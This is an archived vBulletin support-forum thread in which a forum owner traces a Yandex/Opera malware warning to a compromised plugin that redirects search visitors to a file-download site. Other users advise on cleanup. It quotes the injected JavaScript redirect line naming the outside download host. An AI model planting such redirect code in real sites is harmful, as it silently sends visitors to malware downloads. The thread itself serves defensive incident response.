vb.org Archive
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   Malicious site warning (https://vborg.vbsupport.ru/showthread.php?t=324163)

creative-friend 01-10-2017 06:19 AM
Malicious site warning
 
When i open my forum in Opera. Malicious site warning has shown
Quote:
Malicious site warning

This site may be hacked or contain malicious software. Visiting this page may be harmful.

Opera Software strongly discourages visiting this page.
Go back safely
Ignore this warning
Why was this page blocked?


Reported by Yandex
Our fraud reports are maintained by third-party vendors.
But Yandex show, "Your site doesn't have any violations"
How to remove this warning?
forum link: www.pakistanipoint.com

https://vborg.vbsupport.ru/external/2017/01/19.png

Lynne 01-10-2017 04:16 PM
google "yandex remove site from blacklist" and you should find your answer.

creative-friend 01-14-2017 01:42 PM
Quote:
Originally Posted by Lynne (Post 2580667)
google "yandex remove site from blacklist" and you should find your answer.
I am working on it almost one week but could not find any malicious code. Now Yandex show my website contains malicious code. I try to scan forum from different malware scanner, all clear my forum.
May you suggest me any malware scanner for scanning?

Kane@airrifle 01-14-2017 04:33 PM
filestore72

Resources:
https://www.vbulletin.com/forum/foru...lestore72-info

https://clients.urljet.com/knowledge...version-2.html

https://clients.urljet.com/knowledge...e123-Hack.html

--------------- Added [DATE]1484422187[/DATE] at [TIME]1484422187[/TIME] ---------------

And also protect your admincp folder with a passworded htaccess....

creative-friend 01-14-2017 05:40 PM
Quote:
Originally Posted by Kane@airrifle (Post 2580861)
filestore72

Resources:
https://www.vbulletin.com/forum/foru...lestore72-info

https://clients.urljet.com/knowledge...version-2.html

https://clients.urljet.com/knowledge...e123-Hack.html

--------------- Added [DATE]1484422187[/DATE] at [TIME]1484422187[/TIME] ---------------

And also protect your admincp folder with a passworded htaccess....
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware

z3r0 01-14-2017 07:05 PM
Quote:
Originally Posted by creative-friend (Post 2580867)
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware

You are, I just got redirected to myfilestore dot com when testing coming to your site from a google search.

Kane@airrifle 01-14-2017 07:32 PM
Quote:
Originally Posted by creative-friend (Post 2580867)
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware
Best way to test is a site search from a browser in incognito/private mode and not logged in to your forum. Try it, pick any of the returned links and you will be redirected to filestore for that session. I did this on Opera, Firefox, Chrome and Brave and all returned the redirect.

You need to start by buttoning down your admincp folder with a htaccess password. Then follow the guides as provided in my previous post.

creative-friend 01-17-2017 02:06 AM
1 Attachment(s)
Quote:
Originally Posted by Kane@airrifle (Post 2580873)
Best way to test is a site search from a browser in incognito/private mode and not logged in to your forum. Try it, pick any of the returned links and you will be redirected to filestore for that session. I did this on Opera, Firefox, Chrome and Brave and all returned the redirect.

You need to start by buttoning down your admincp folder with a htaccess password. Then follow the guides as provided in my previous post.
Quote:
Originally Posted by z3r0 (Post 2580872)
You are, I just got redirected to myfilestore dot com when testing coming to your site from a google search.
thank you so much

--------------- Added [DATE]1484626252[/DATE] at [TIME]1484626252[/TIME] ---------------

I have found infected plugin by manually checking of all plugin.

Product: VBulletin
Hook location: parse_templates
Title: AME - Display Don't Auto Convert Option
Code: See attached txt file

--------------- Added [DATE]1484627008[/DATE] at [TIME]1484627008[/TIME] ---------------

Now i disable this plugin, but how it will be completely remove???
delete this plugin or only remove code

Yandex support also identified this mistake

Quote:
The following malicious code appears at your site from time to time:

document.location='http://myfilestore.com/download.php?id=ed4d0ec3'

when the following URL is loaded:

http://www.pakistanipoint.com/misc.p...22&js=js123456

Please, check your files and remove the malicious code.

TheLastSuperman 01-17-2017 02:58 AM
1 Attachment(s)
Quote:
Originally Posted by creative-friend (Post 2580953)
thank you so much

--------------- Added [DATE]1484626252[/DATE] at [TIME]1484626252[/TIME] ---------------

I have found infected plugin by manually checking of all plugin.

Product: VBulletin
Hook location: parse_templates
Title: AME - Display Don't Auto Convert Option
Code: See attached txt for code


--------------- Added [DATE]1484627008[/DATE] at [TIME]1484627008[/TIME] ---------------

Now i disable this plugin, but how it will be completely remove???
delete this plugin or only remove code

Yandex support also identified this mistake
Remove the code shown in Red then save the plugin, afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
**Edit - Code to remove is marked by [Remove This Code] in attached file.

creative-friend 01-17-2017 03:16 AM
Quote:
Originally Posted by TheLastSuperman (Post 2580957)
afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
Thank you so much sir

I cannot find how to save plugin display order


All times are GMT. The time now is 02:45 AM.
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01909 seconds
  • Memory Usage 1,750KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (10)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete